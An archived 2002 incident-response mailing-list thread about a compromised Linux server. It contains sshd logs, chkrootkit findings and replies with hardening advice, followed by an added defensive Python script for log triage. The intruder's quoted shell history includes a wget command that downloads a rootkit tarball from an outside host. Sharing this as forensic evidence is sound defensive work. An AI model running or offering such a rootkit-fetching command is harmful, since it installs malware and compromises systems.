hi ya ver

On Wed, 11 Sep 2002, Ver Allan Sumabat wrote:

> we used linux 2.4.7-10. we only opened ports 21 (ftp),
> 22 (ssh), and 443 (https).
>
> 21 - wu-ftpd-2.6.1-20
> 22 - openssh-3.1
> 443 - tomcat-3.2.4

what does nmap say is also open, to the outside and to the inside of
your corp lan ??

> 1. this is the content of /home/war's .bash_history:
>
> wget
> wget http://mrunix.free.fr/roy/w00tkit.tgz
> logout

game over... they are already in your server ...

- they probably got in thru wu-ftpd and/or openssh
  ( check the respective websites for the current
  ( versions you should have been running

- you should NOT have been running 2.4.7-10 kernels...
  you should always compile your own kernel and apply
  your own kernel hardening apps

they were trying to get more rootkits installed ( w00tkit )

> 2. he was trying to send a mail to himself regarding
> the system's resources:
>
> The original message was received at Thu, 5 Sep 2002
> 22:21:37 +0800
> from root@localhost
>
> ----- The following addresses had permanent fatal
> errors -----
> roi_blablaat_private
> (reason: 501 5.1.8 Sender domain must exist)

seems really really odd that the [h/cr]acker would send themself
an email to a domain that does not exist or to reject it...
must be another hacked box they are playing with ??

- more server hardening/tightening stuff
  http://www.Linux-Sec.net

c ya
alvin

>
> ----- Transcript of session follows -----
> ... while talking to rmail.walla.co.il.:
> >>> MAIL From:<rootat_private> SIZE=2283
> <<< 501 5.1.8 Sender domain must exist
> 501 5.6.0 Data format error
>
> 3. walla.co.il is in israel
>
> 4. tracing 212.179.207.211 gives israel also.
>
> i have moved the files to another machine and
> reinstalled the server 'cause we need to put it up and
> running asap. do you think the exploit was done thru
> ftp? can you help me replicate it? i was looking for
> procedures or scripts in ssh/ftp exploits so that i
> can try to attack our server but i can not find any.
>
> --- Loki <lokiat_private> wrote:
> > What version of SSHD were you running, check
> > commonly exploited services.
> >
> > 1. SSHD (crc32)
> > 2. FTPD
> > 3. Apache (chunking)
> >
> > Get back to us with the versions you were running of
> > SSH, FTP, and Apache and we can help you out. How
> > hardened was the OS? Did you turn off all RPC
> > services, etc. We need more info.
> >
> > Eric/Loki
> > Internet Warfare and Intelligence
> > Fate Research Labs
> > www.fatelabs.com
> >
> > -----Original Message-----
> > From: Ver Allan Sumabat [mailto:ver_allanat_private]
> > Sent: Tuesday, September 10, 2002 6:08 AM
> > To: incidentsat_private
> > Subject: possible ssh hack
> >
> > Hi,
> >
> > We have just recently been hacked. I have no idea
> > how he came in. Here are my preliminary investigations:
> >
> > 1. He was able to add a user without logging in.
> >
> > **Unmatched Entries**
> > Sep 5 10:39:33 srv1 sshd[20514]: Could not reverse map address 10.13.41.4.
> > Sep 5 10:39:35 srv1 sshd[20514]: Accepted password for root from 10.13.41.4 port 4207
> > Sep 5 17:30:36 srv1 sshd[23299]: Could not reverse map address 10.13.41.4.
> > Sep 5 17:30:41 srv1 sshd[23299]: Accepted password for root from 10.13.41.4 port 2491
> > Sep 5 22:16:59 srv1 useradd[23532]: new group: name=war, gid=502
> > Sep 5 22:16:59 srv1 useradd[23532]: new user: name=war, uid=502, gid=502, home=/home/war, shell=/bin/bash
> > Sep 5 22:17:31 srv1 sshd[23534]: Accepted password for war from 212.179.207.211 port 2746
> > Sep 5 22:19:17 srv1 sshd[23580]: fatal: Read from socket failed: Connection reset by peer
> > Sep 5 22:21:48 srv1 sshd[928]: Received SIGHUP; restarting.
> >
> > 2. He installed a tarball w00tkit.tgz in /home/war
> >
> > 3. After running chkrootkit, the significant lines are:
> >
> > ...
> > Checking `ifconfig'... INFECTED
> > ...
> > Searching for Showtee... Warning: Possible Showtee Rootkit installed
> > ...
> > Checking `lkm'... You have 1 process hidden for ps command
> > Warning: Possible LKM Trojan installed
> >
> > 4. ssh won't run anymore
> >
> > Can anyone help me on how the intrusion was done?
> >
> > Thanks.
> >
> > Regards,
> >
> > Allan
> >
> > ----------------------------------------------------------------------------
> > This list is provided by the SecurityFocus ARIS analyzer service. For
> > more information on this free incident handling, management
> > and tracking system please see: http://aris.securityfocus.com
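The sshd/useradd lines Allan posted are enough to reconstruct the sequence alvin calls "game over": repeated root password logins from the LAN, a new account created, that account logging in from an outside address seconds later, and sshd restarting a few minutes after that. The following script is an added example for this archive page (not code from any of the posters) that runs that triage over those lines. The rule names, the RFC 1918 ranges used to decide "LAN vs external", the one-hour correlation window, and the year (syslog timestamps carry none; 2002 is taken from the thread date) are assumptions of the example, not anything the thread states.

```python
"""Triage sshd/useradd syslog lines for the intrusion pattern in this thread.

Added example for this archive page; not code from any of the posters.
SAMPLE_LOG is the logwatch excerpt from the post, unwrapped onto single
lines. Assumptions: year 2002, RFC 1918 ranges as "LAN", one-hour window.
"""
import ipaddress
import re
from datetime import datetime, timedelta

SAMPLE_LOG = """\
Sep  5 10:39:33 srv1 sshd[20514]: Could not reverse map address 10.13.41.4.
Sep  5 10:39:35 srv1 sshd[20514]: Accepted password for root from 10.13.41.4 port 4207
Sep  5 17:30:36 srv1 sshd[23299]: Could not reverse map address 10.13.41.4.
Sep  5 17:30:41 srv1 sshd[23299]: Accepted password for root from 10.13.41.4 port 2491
Sep  5 22:16:59 srv1 useradd[23532]: new group: name=war, gid=502
Sep  5 22:16:59 srv1 useradd[23532]: new user: name=war, uid=502, gid=502, home=/home/war, shell=/bin/bash
Sep  5 22:17:31 srv1 sshd[23534]: Accepted password for war from 212.179.207.211 port 2746
Sep  5 22:19:17 srv1 sshd[23580]: fatal: Read from socket failed: Connection reset by peer
Sep  5 22:21:48 srv1 sshd[928]: Received SIGHUP; restarting.
"""

# BSD syslog: "Mon dd HH:MM:SS host prog[pid]: message"
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[\w.-]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
ACCEPTED_RE = re.compile(
    r"^Accepted (?P<method>\S+) for (?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)
USERADD_RE = re.compile(r"^new user: name=(?P<user>[^,]+), uid=(?P<uid>\d+)")


def parse_syslog(line, year=2002):
    """Split one syslog line into fields; None for lines that do not match."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "host": m["host"], "prog": m["prog"], "msg": m["msg"]}


def triage(text, lan_nets=("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"),
           window=timedelta(hours=1)):
    """Return (timestamp, rule, detail) findings in input order.

    root-login         sshd accepted a password for root
    account-created    useradd logged a new account
    new-account-login  that account logged in within `window` of creation
    sshd-restart       sshd got SIGHUP while a freshly created account exists
    """
    lan = [ipaddress.ip_network(n) for n in lan_nets]
    created = {}  # username -> creation time
    findings = []
    for line in text.splitlines():
        ev = parse_syslog(line)
        if ev is None:
            continue
        ts, msg = ev["ts"], ev["msg"]
        if ev["prog"] == "useradd":
            u = USERADD_RE.match(msg)
            if u:
                created[u["user"]] = ts
                findings.append((ts, "account-created",
                                 f"user {u['user']} uid {u['uid']} added on {ev['host']}"))
            continue
        if ev["prog"] != "sshd":
            continue
        a = ACCEPTED_RE.match(msg)
        if a:
            ip = ipaddress.ip_address(a["ip"])
            where = "LAN" if any(ip in n for n in lan) else "external"
            if a["user"] == "root":
                findings.append((ts, "root-login",
                                 f"root {a['method']} login from {ip} ({where})"))
            if a["user"] in created and ts - created[a["user"]] <= window:
                age = int((ts - created[a["user"]]).total_seconds())
                findings.append((ts, "new-account-login",
                                 f"{a['user']} logged in {age}s after creation from {ip} ({where})"))
            continue
        if msg.startswith("Received SIGHUP") and any(ts - t <= window for t in created.values()):
            findings.append((ts, "sshd-restart",
                             "sshd restarted soon after a new account appeared; "
                             "verify the sshd binary and sshd_config"))
    return findings


if __name__ == "__main__":
    for ts, rule, detail in triage(SAMPLE_LOG):
        print(f"{ts:%b %d %H:%M:%S}  {rule:<18} {detail}")
```

Run against the posted lines it reports two root password logins from the 10.13.41.4 box, the creation of `war`, that account's login from 212.179.207.211 32 seconds later, and the sshd restart at 22:21:48. The root logins from inside the LAN are the part worth chasing on the corporate side, which is the same point alvin makes about looking inward with nmap: whoever held 10.13.41.4 had the root password before the `war` account ever existed.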
This archive was generated by hypermail 2b30 : Thu Sep 12 2002 - 23:06:00 PDT